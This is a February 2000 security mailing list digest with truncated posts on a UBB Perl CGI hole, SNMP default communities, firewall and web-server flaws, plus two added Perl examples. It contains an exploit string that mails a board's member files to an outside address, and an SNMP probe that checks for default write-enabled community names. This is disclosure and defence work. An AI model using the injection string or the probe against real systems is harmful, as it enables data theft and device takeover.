Re: perl-cgi hole in UltimateBB by Infopop Corp.

2000-02-16 Thread Charles Capps
For the record, the latest versions of the UBB (Freeware version '2000', and a new release of licensed version 5.43d) contain fixes for this bug as of yesterday. The fix has also been posted in this thread: http://www.scriptkeeper.com/ubb/Forum16/HTML/000814.html -- Charles Capps - Origina

Re: perl-cgi hole in UltimateBB by Infopop Corp.

2000-02-16 Thread Jordan Ritter
On Mon, 14 Feb 2000, Kevin Hillabolt wrote: # It works on the full version also... # # Little different syntax: # topic=012345.cgi|cat%20../Members/*|mail [EMAIL PROTECTED]| # (note the ../ on the Members. You have to go up a directory to get the # file. Maybe you could stop it via simple folde

Re: perl-cgi hole in UltimateBB by Infopop Corp.

2000-02-16 Thread Andrew Danforth
On Mon, 14 Feb 2000, Bill wrote: > "Sergei A. Golubchik" wrote: > > The fix is obvious. But the rule of thumb is "do not use magic perl > > open". At least in cgi scripts. If you want to open a regular file, > > sysopen does the trick as well. > >Isn't open(FH, "< $variable") sufficient to

Re: FireWall-1 FTP Server Vulnerability

2000-02-16 Thread Borbely Zoltan
On Mon, Feb 14, 2000 at 07:32:54PM -0600, monti wrote: [...snip...] > I dont really think the issue is with 'how' the PASV response and packet > appears on the wire, but with the Firewall's logic in creating a hole for > PASV ftp data connections. I think the firewall should probably be a bit > m

Re: snmp problems still alive...

2000-02-16 Thread Gus Huber
It should be noted in this discussion that MANY of these devices also, through SNMP queries, can be completely compromised by either sending or receiving configuration files from arbitrary locations. Both cisco and ascend products support downloading and uploading of configuration files via tftp fr

Re: snmp problems still alive...

2000-02-16 Thread Ryan Russell
Nice summary. > - Windows 98 (not 95) - public You have to install the agent, it's not stock. And it's not so much that the world-writable string is "public" as it is that there isn't one. You'll get write access no matter what community name you use. MS made improvements under NT, 'cause it wa

AIX SNMP Defaults

2000-02-16 Thread harikiri
Following on from Michael Zalewski's recent SNMP post, here's an issue i noted on two AIX systems. NOTE: This was seen on both AIX 4.3 and 4.2. It appears that on the above releases of AIX, the SNMP daemon is enabled by default and two community names are enabled with read/write privileges. The

Re: DDOS Attack Mitigation

2000-02-16 Thread Bennett Todd
2000-02-14-13:44:09 Julien Nadeau: > A solution would be for kernels to provide an option to keep a > local IP lookup table which could be simply based on network > interfaces; of course, given a stable implementation, this option > enabled by default would take care of spoofing problems for admi

Re: Packet Tracing (linux klog patch)

2000-02-16 Thread Andrzej Bialecki
On Sat, 12 Feb 2000, Dragos Ruiu wrote: > How to use it: > -This patch makes the kernel log all ethernet packets to syslog. > -The logging happens at the default level. I.e. normally on. > -You can turn logging on and off at the console by using the Magic SysRq key > and a number to change the

Re: CGI.pm and the untrusted-URL problem

2000-02-16 Thread Olaf Seibert
On Mon 14 Feb 2000 at 14:01:48 -0500, Kragen Sitaker wrote: > The successful exploit requires a remarkable chain of extreme forgiveness: > 1- The web browser must accept an illegal URL from (possibly valid, >although very unusual) HTML. > 2- The web browser must send an illegal HTTP request wi

Re: ASP Security Hole (PHP Too)

2000-02-16 Thread Joshua J. Drake
The following is also true for PHP. Naming PHP include files .inc gives anyone full-read access to the files by simply requesting them by name. The solution of course is to do one of the following: a. name php include files with a PHP extension (.php, .php3, etc) that is associated wit

NetBSD Security Advisory 2000-001

2000-02-16 Thread Daniel Carosone
-----BEGIN PGP SIGNED MESSAGE----- NetBSD Security Advisory 2000-001 Topic: procfs security hole Version: NetBSD 1.4.1 and prior; NetBSD-current until 2126 Severity: If the proc filesystem is mounted, a

Doubledot bug in FrontPage FrontPage Personal Web Server.

2000-02-16 Thread Jan van de Rijt
Description: Doubledot bug in FrontPage FrontPage Personal Web Server. Compromise: Accessing drive through browser. Vulnerable Systems: Frontpage-PWS32/3.0.2.926, other versions not tested. Details: When FrontPage-PWS runs a site on your c:\ drive your drive could be accessed by any user accessing

Re: 'cross site scripting' CERT advisory and MS

2000-02-16 Thread David LeBlanc
I wanted to reply to this, and make a clarification - At 08:57 PM 2/14/00 -0500, Rishi Lee Khan wrote: >There is an easy way to open a web page using and email client using HTML >parsing ... simply put in the tag content="0;URL=http://www.yourpagehere.com"> Tried it, and it doesn't seem to work

Microsoft Security Bulletin (MS00-009)

2000-02-16 Thread Microsoft Product Security
The following is a Security Bulletin from the Microsoft Product Security Notification Service. Please do not reply to this message, as it was sent from an unattended mailbox. Microsoft Security Bulletin (MS00-009)

Re: snmp problems still alive...

2000-02-16 Thread John Comeau
Cisco 1924s for sure have "public" as rw string and "private" for ro, and I'm about 80% sure the 2924 does too. Many Cisco routers have an snmp "feature" with security ramifications which Damir Rajnovic has agreed to post to Bugtraq (as of Jan. 1), but I guess Cisco's lawyers have to hash it out
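The SNMP threads above (Gus Huber, Ryan Russell, harikiri, John Comeau) all come down to the same check: which community names does a device answer to, and are any of them writable. The following is an added example, not code from any of the posters, of a dependency-free SNMPv1 probe in Perl that asks for sysDescr.0 with each candidate community and, with --write, tests for write access by setting sysLocation.0 to the value it already has, which is the usual non-destructive way to tell an rw string from an ro one. The default candidate list ("public", "private") is taken from the thread; the host, port 161 and the two-second timeout are assumptions. Use it only against devices you are authorised to test.

```perl
#!/usr/bin/perl
# Added example: hand-rolled SNMPv1 community probe (core modules only).
#   perl snmp_probe.pl [--write] host [community ...]
use strict;
use warnings;
use IO::Socket::INET;
use IO::Select;

my $SYSDESCR = '1.3.6.1.2.1.1.1.0';
my $SYSLOC   = '1.3.6.1.2.1.1.6.0';

# --- minimal BER encoding / decoding -------------------------------------
sub ber_len { my $n = shift; $n < 128 ? chr($n) : $n < 256 ? "\x81" . chr($n) : "\x82" . pack('n', $n) }
sub tlv     { my ($tag, $v) = @_; chr($tag) . ber_len(length $v) . $v }
sub ber_int {                                   # non-negative integers only
    my $n = shift; my $b = '';
    do { $b = chr($n & 0xff) . $b; $n >>= 8 } while $n;
    $b = "\x00" . $b if ord($b) & 0x80;         # keep the sign bit clear
    return tlv(0x02, $b);
}
sub ber_oid {                                   # dotted string -> OBJECT IDENTIFIER
    my @id = split /\./, shift;
    my $out = chr($id[0] * 40 + $id[1]);
    for my $n (@id[2 .. $#id]) {
        my $enc = chr($n & 0x7f);               # base-128, high bit = "more follows"
        for ($n >>= 7; $n; $n >>= 7) { $enc = chr(0x80 | ($n & 0x7f)) . $enc }
        $out .= $enc;
    }
    return tlv(0x06, $out);
}
sub ber_read {                                  # pop one TLV off $$ref -> (tag, contents)
    my $ref = shift;
    my ($tag, $l, $hdr) = (ord substr($$ref, 0, 1), ord substr($$ref, 1, 1), 2);
    if ($l & 0x80) { my $n = $l & 0x7f; $l = 0; $l = ($l << 8) | ord substr($$ref, $hdr++, 1) for 1 .. $n }
    my $val = substr($$ref, $hdr, $l);
    $$ref = substr($$ref, $hdr + $l);
    return ($tag, $val);
}

# SNMPv1 message: SEQ { version 0, community, PDU { reqid, 0, 0, SEQ { SEQ { oid, value } } } }
sub snmp_msg {
    my ($pdu_tag, $community, $reqid, $oid, $value) = @_;   # $value is already BER
    my $vb  = tlv(0x30, ber_oid($oid) . $value);
    my $pdu = tlv($pdu_tag, ber_int($reqid) . ber_int(0) . ber_int(0) . tlv(0x30, $vb));
    return tlv(0x30, ber_int(0) . tlv(0x04, $community) . $pdu);
}

# One request/response.  Returns { error => n, value => bytes } or undef when the
# agent stays silent, which is what a v1 agent does for a wrong community.
sub snmp_exchange {
    my ($host, $community, $pdu_tag, $oid, $value, $timeout) = @_;
    my $sock = IO::Socket::INET->new(Proto => 'udp', PeerAddr => $host, PeerPort => 161)
        or die "socket: $!\n";
    $sock->send(snmp_msg($pdu_tag, $community, 1 + int rand 0x7fffffff, $oid, $value));
    return undef unless IO::Select->new($sock)->can_read($timeout);
    my $buf; $sock->recv($buf, 2048);
    my ($t, $msg) = ber_read(\$buf);            return undef unless $t == 0x30;
    ber_read(\$msg) for 1, 2;                   # skip version and community
    my ($pt, $pdu) = ber_read(\$msg);           return undef unless $pt == 0xA2;   # GetResponse
    ber_read(\$pdu);                            # request-id
    my (undef, $err) = ber_read(\$pdu);         # error-status
    ber_read(\$pdu);                            # error-index
    my (undef, $list) = ber_read(\$pdu);
    my (undef, $vb)   = ber_read(\$list);
    ber_read(\$vb);                             # oid
    my (undef, $val)  = ber_read(\$vb);
    return { error => ord($err), value => $val };
}

my $write = grep { $_ eq '--write' } @ARGV;
my ($host, @communities) = grep { $_ ne '--write' } @ARGV;
die "usage: $0 [--write] host [community ...]\n" unless defined $host;
@communities = qw(public private) unless @communities;   # the defaults named in the thread

for my $c (@communities) {
    my $r = snmp_exchange($host, $c, 0xA0, $SYSDESCR, "\x05\x00", 2);   # GetRequest, NULL value
    if (!$r)         { printf "%-12s no response\n", $c; next }
    if ($r->{error}) { printf "%-12s answered, error-status %d\n", $c, $r->{error}; next }
    my $access = 'read';
    if ($write) {    # SetRequest of the current sysLocation back onto itself
        my $loc = snmp_exchange($host, $c, 0xA0, $SYSLOC, "\x05\x00", 2);
        if ($loc && !$loc->{error}) {
            my $set = snmp_exchange($host, $c, 0xA3, $SYSLOC, tlv(0x04, $loc->{value}), 2);
            $access = ($set && !$set->{error}) ? 'read/WRITE' : 'read only';
        }
    }
    printf "%-12s %-10s sysDescr=%s\n", $c, $access, $r->{value};
}
```

A community that never answers is simply dropped by a v1 agent, so "no response" is the expected result for a wrong string and the probe cannot distinguish it from a filtered port; run it from a host the device's access list allows. The write test rewrites a value that is already there, but on some devices any successful Set still marks the configuration as changed, so use --write only where that is acceptable.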

Re: FireWall-1 FTP Server Vulnerability

2000-02-16 Thread Henrik Nordstrom
monti wrote: > The attacker then issues something like a 'stat -1 filename', > and plays Interesting.. a bug in wuftpd which makes the life a lot more interesting for the FW1 issue. The bug is that wuftpd does not pad lines that may be misread as FTP status codes in multiline responses with a s

Re: CGI.pm and the untrusted-URL problem

2000-02-16 Thread Kragen Sitaker
Lincoln Stein writes: > The important point is that anything coming from the outside -- the > URL, the SERVER_PROTOCOL, the request body, the request MIME type -- > should be treated as untrusted data. If you turn on taint checking, > Perl will refuse to take "dangerous actions" with untrusted da
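The UBB thread above (Kevin Hillabolt's "topic=012345.cgi|cat ../Members/*|mail ...|" string, and the magic-open versus open(FH, "< $variable") versus sysopen exchange) and Lincoln Stein's point about taint checking are two halves of the same lesson. The following is an added example, not UBB code and not from any of the posters, that opens an attacker-shaped "topic" value three ways so the difference is visible. The harmless command standing in for the exploit, and the assumption that a topic file name is six digits followed by ".cgi", are mine.

```perl
#!/usr/bin/perl
# Added example, not UBB code: the three ways of opening a file named by a
# CGI parameter, run against input in the shape of the posted exploit.
#   perl open_demo.pl      # magic open executes the command
#   perl -T open_demo.pl   # taint mode aborts the piped open
use strict;
use warnings;
use Fcntl qw(O_RDONLY);

# Constructed input.  The posted string was "012345.cgi|cat ../Members/*|mail ...|";
# a harmless command stands in for it.  The trailing '|' is what turns a magic
# open into a pipe.  Appending a zero-length slice of %ENV marks the string as
# tainted under -T, exactly as real CGI input would be.
my $topic = 'echo PWNED|' . substr($ENV{PATH} // '', 0, 0);

$ENV{PATH} = '/bin:/usr/bin';               # -T refuses to run anything with an unclean PATH
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

sub slurp { my $fh = shift; local $/; my $data = <$fh>; close $fh; return defined $data ? $data : '' }

# 1. Magic two-argument open: the string itself selects the mode.  A leading or
#    trailing '|' means "run this as a shell command and read its output".
sub magic_open {
    my $name = shift;
    open(my $fh, $name) or return "open failed: $!";   # never do this with user data
    return slurp($fh);
}

# 2. Three-argument open: the mode is fixed to '<', so the string can only ever
#    be a path.  No command execution, but "../Members/x" would still be read.
sub three_arg_open {
    my $name = shift;
    open(my $fh, '<', $name) or return "open failed: $!";
    return slurp($fh);
}

# 3. Accept only the one shape a topic file name can have (six digits plus ".cgi"
#    is an assumption taken from the exploit string).  The capture is also what
#    untaints $name under -T.  sysopen() is never magic.
sub checked_open {
    my $name = shift;
    my ($safe) = $name =~ /^(\d{6}\.cgi)$/
        or return "rejected: bad topic name";
    sysopen(my $fh, $safe, O_RDONLY) or return "open failed: $!";
    return slurp($fh);
}

my %try = (magic_open => \&magic_open, three_arg_open => \&three_arg_open,
           checked_open => \&checked_open);
for my $name (qw(magic_open three_arg_open checked_open)) {
    my $result = eval { $try{$name}->($topic) };
    $result = "died: $@" if $@;
    $result = '' unless defined $result;
    $result =~ s/\s+\z//;
    printf "%-15s %s\n", $name, $result;
}
```

Without -T the first line of output is "magic_open PWNED": the shell ran the command. The three-argument open reports "No such file or directory" because it looked for a file literally called "echo PWNED|", and the checked open rejects the name outright. Under -T the magic open dies with an "Insecure dependency" error before anything runs, which is the protection Lincoln Stein describes; the three-argument open is still allowed to read a tainted path, so taint mode alone does not stop the "../Members" traversal, and the pattern check in the third variant is what does.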

New Tool for DDoS Defense

2000-02-16 Thread Simple Nomad
I've written a tool for remotely telling ddos zombies to stop flooding. Most detectors out there will not detect during a flood (due to the traffic involved), so I thought trying to turn the flood off might be kind of nice. Like the detectors, it assumes default settings on the ddos daemons. Works